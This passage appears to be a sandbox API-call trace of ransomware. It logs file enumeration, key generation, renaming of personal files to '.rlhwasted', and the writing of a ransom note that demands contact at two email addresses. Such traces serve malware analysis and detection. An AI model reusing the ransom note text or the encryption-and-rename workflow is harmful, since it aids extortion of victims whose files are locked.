HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\X1j1LLo4F5qLaTkwx.m4a.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\x1j1llo4f5qlatkwx.m4a.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0195.527] WriteFile (in: hFile=0x128, lpBuffer=0x6edd68*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6edd68*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0195.528] SetEndOfFile (hFile=0x128) returned 1 [0195.528] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.528] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6edd68 | out: hHeap=0x6b0000) returned 1 [0195.528] lstrcpyW (in: lpString1=0x70d088, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0195.529] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\X1j1LLo4F5qLaTkwx.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\x1j1llo4f5qlatkwx.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\X1j1LLo4F5qLaTkwx.m4a.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\x1j1llo4f5qlatkwx.m4a.rlhwasted")) returned 1 [0195.530] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\X1j1LLo4F5qLaTkwx.m4a.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\x1j1llo4f5qlatkwx.m4a.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0195.530] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0195.532] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0195.533] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0195.533] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.533] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0195.533] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0195.533] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.544] SetEndOfFile (hFile=0x128) returned 1 [0195.546] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6edd68 | out: hHeap=0x6b0000) returned 1 [0195.546] CloseHandle (hObject=0x128) returned 1 [0195.548] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0195.548] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0195.549] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0195.549] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.549] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\_esXKlbPDFrVE.mp3") returned 76 [0195.549] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a2) returned 0x6e8978 [0195.550] lstrcpyW (in: lpString1=0x6e8a10, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0195.550] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6edd68 [0195.550] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0195.551] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6edd68 | out: pbBuffer=0x6edd68) returned 1 [0195.551] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.551] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\_esXKlbPDFrVE.mp3.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\_esxklbpdfrve.mp3.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0195.551] WriteFile (in: hFile=0x128, lpBuffer=0x6edd68*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6edd68*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0195.553] SetEndOfFile (hFile=0x128) returned 1 [0195.553] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.553] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6edd68 | out: hHeap=0x6b0000) returned 1 [0195.553] lstrcpyW (in: lpString1=0x6e8a10, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0195.553] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\_esXKlbPDFrVE.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\_esxklbpdfrve.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\_esXKlbPDFrVE.mp3.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\_esxklbpdfrve.mp3.rlhwasted")) returned 1 [0195.554] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\_esXKlbPDFrVE.mp3.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\_esxklbpdfrve.mp3.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0195.555] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x12c [0195.636] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x710fe8) returned 1 [0195.637] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x6eda80 | out: pbBuffer=0x6eda80) returned 1 [0195.637] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0195.637] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x710fe8) returned 1 [0195.638] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0195.638] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0195.648] SetEndOfFile (hFile=0x128) returned 1 [0195.651] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0195.651] CloseHandle (hObject=0x128) returned 1 [0195.654] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0195.654] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0195.655] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0195.655] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.655] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aeDT\\9 NzRDUbnqwUUqbJDtb.jpg") returned 71 [0195.655] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x298) returned 0x6e8978 [0195.655] lstrcpyW (in: lpString1=0x6e8a06, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0195.655] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0195.655] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0195.656] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0195.656] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.656] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aeDT\\9 NzRDUbnqwUUqbJDtb.jpg.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\aedt\\9 nzrdubnqwuuqbjdtb.jpg.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0195.657] WriteFile (in: hFile=0x128, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0195.659] SetEndOfFile (hFile=0x128) returned 1 [0195.659] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.659] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0195.659] lstrcpyW (in: lpString1=0x6e8a06, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0195.659] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aeDT\\9 NzRDUbnqwUUqbJDtb.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\aedt\\9 nzrdubnqwuuqbjdtb.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aeDT\\9 NzRDUbnqwUUqbJDtb.jpg.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\aedt\\9 nzrdubnqwuuqbjdtb.jpg.rlhwasted")) returned 1 [0195.660] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aeDT\\9 NzRDUbnqwUUqbJDtb.jpg.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\aedt\\9 nzrdubnqwuuqbjdtb.jpg.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0195.660] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0195.663] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0195.664] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6eda80 | out: pbBuffer=0x6eda80) returned 1 [0195.664] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.664] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0195.665] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0195.666] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.675] SetEndOfFile (hFile=0x128) returned 1 [0195.678] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0195.678] CloseHandle (hObject=0x128) returned 1 [0195.717] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0195.717] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x708ba0 | out: hHeap=0x6b0000) returned 1 [0195.717] _aulldvrm () returned 0x0 [0195.717] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x710fe8) returned 1 [0195.720] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0195.720] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0195.720] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aeDT\\fkkQJHijzGdXgFd5q.png") returned 69 [0195.720] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x294) returned 0x6d5830 [0195.720] lstrcpyW (in: lpString1=0x6d58ba, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0195.720] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6edd68 [0195.720] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x710fe8) returned 1 [0195.721] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6edd68 | out: pbBuffer=0x6edd68) returned 1 [0195.721] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0195.722] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aeDT\\fkkQJHijzGdXgFd5q.png.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\aedt\\fkkqjhijzgdxgfd5q.png.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0195.724] WriteFile (in: hFile=0x104, lpBuffer=0x6edd68*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6edd68*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0195.725] SetEndOfFile (hFile=0x104) returned 1 [0195.726] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.726] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6edd68 | out: hHeap=0x6b0000) returned 1 [0195.726] lstrcpyW (in: lpString1=0x6d58ba, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0195.726] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aeDT\\fkkQJHijzGdXgFd5q.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\aedt\\fkkqjhijzgdxgfd5q.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aeDT\\fkkQJHijzGdXgFd5q.png.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\aedt\\fkkqjhijzgdxgfd5q.png.rlhwasted")) returned 1 [0195.728] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aeDT\\fkkQJHijzGdXgFd5q.png.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\aedt\\fkkqjhijzgdxgfd5q.png.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0195.728] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x12c [0195.729] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x15cad [0195.729] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15cad) returned 0xb00000 [0195.729] CloseHandle (hObject=0x128) returned 1 [0195.735] UnmapViewOfFile (lpBaseAddress=0xb00000) returned 1 [0195.735] CloseHandle (hObject=0x12c) returned 1 [0195.735] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6eda38 [0195.736] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x710fe8) returned 1 [0195.737] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x6eda80 | out: pbBuffer=0x6eda80) returned 1 [0195.737] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0195.737] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x710fe8) returned 1 [0195.738] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0195.738] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0195.830] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d5420 [0195.830] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eda38 | out: hHeap=0x6b0000) returned 1 [0195.830] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0195.830] _snwprintf (in: _Dest=0x715c88, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]fSWNWnSdPRsLybYWgJ6l0Wit+9EnDBRu5Rzn3k6mI7E6Rif+YIdhVPEu27YGhmF6\r\n5WzMvJZes/h2cVQsYbYwLeJKImqPWKDaq+B1dKtCP7hlzdLnK1zd28GPIZGaM+uG\r\nC+Sw2NdWFKrarGpbo0cmgLfuQ5n4+ybk6b/2NmtbXAxt+i53BgJeRamdm4z2EXDa\r\nQyEiY80TcIeWvY8WMz3gLQonVNVcI+nPdrkWCxiGpP29IRRJj4UMbxr6VowNB+5c\r\nZrd1YweOVfjYBFbzmMhJoRp0vfbMGZP+qkuYvAKMT+Vi4O3bXotJpZsq0RPOA55U\r\n3LHH6w/euezd+58TPS0//H2oDJAgU64U12drqN2dp4Dv39HVqdep5oRdJX8BpcYA\r\nvf0i/dk7a8kuRmaVybVDNHj5u97NqFNGVfRbyL4CShNLJQJr5J9DeGU3QsvEnatX\r\nk4T4EhV0JviJ0+GaDpMDJuyEykZYyHWy3G8l3NtSWTWuylo8c1/NMxxkZ2sOkicM\r\n6h1BpuHY7UZLcy2q1679IUNx2AwGuV5ZcL7qdmddNI0skwzuYZnLra2UvDwIde7S\r\nA4VF7KKG94ENnCZZO1b+zNI0sNNdmAujHF9jzA/oLiL8bJi1JyCTP0gXruAqj/Gx\r\nN2c31uKNgCxCCoQ1t+AW/E7U2xOIIqitczwl9mARl8Q=[end_key]\r\nKEEP IT\r\n") returned 981 [0195.830] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0195.830] WriteFile (in: hFile=0x104, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0195.830] SetEndOfFile (hFile=0x104) returned 1 [0195.833] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0195.833] CloseHandle (hObject=0x104) returned 1 [0195.835] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5830 | out: hHeap=0x6b0000) returned 1 [0195.835] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7f90 | out: hHeap=0x6b0000) returned 1 [0195.835] _aulldvrm () returned 0x0 [0195.835] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f98) returned 1 [0195.891] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0195.891] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0195.891] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aeDT\\_LCrNnWSUOUtUf5j.gif") returned 68 [0195.891] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x292) returned 0x6e7988 [0195.891] lstrcpyW (in: lpString1=0x6e7a10, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0195.891] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0195.891] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f98) returned 1 [0195.892] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0xa34, pbBuffer=0x715c88 | out: pbBuffer=0x715c88) returned 1 [0195.892] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0195.892] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aeDT\\_LCrNnWSUOUtUf5j.gif.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\aedt\\_lcrnnwsuoutuf5j.gif.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0195.893] WriteFile (in: hFile=0x104, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0195.894] SetEndOfFile (hFile=0x104) returned 1 [0195.894] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.894] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0195.894] lstrcpyW (in: lpString1=0x6e7a10, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0195.895] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aeDT\\_LCrNnWSUOUtUf5j.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\aedt\\_lcrnnwsuoutuf5j.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aeDT\\_LCrNnWSUOUtUf5j.gif.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\aedt\\_lcrnnwsuoutuf5j.gif.rlhwasted")) returned 1 [0195.896] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aeDT\\_LCrNnWSUOUtUf5j.gif.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\aedt\\_lcrnnwsuoutuf5j.gif.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0195.896] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x12c [0195.896] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0xaf8a [0195.896] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xaf8a) returned 0x6a0000 [0195.896] CloseHandle (hObject=0x128) returned 1 [0195.900] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0195.901] CloseHandle (hObject=0x12c) returned 1 [0195.901] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6e8978 [0195.901] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f98) returned 1 [0195.902] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0x1b8, pbBuffer=0x6e89c0 | out: pbBuffer=0x6e89c0) returned 1 [0195.902] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0195.902] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f98) returned 1 [0195.903] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0195.903] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0195.914] 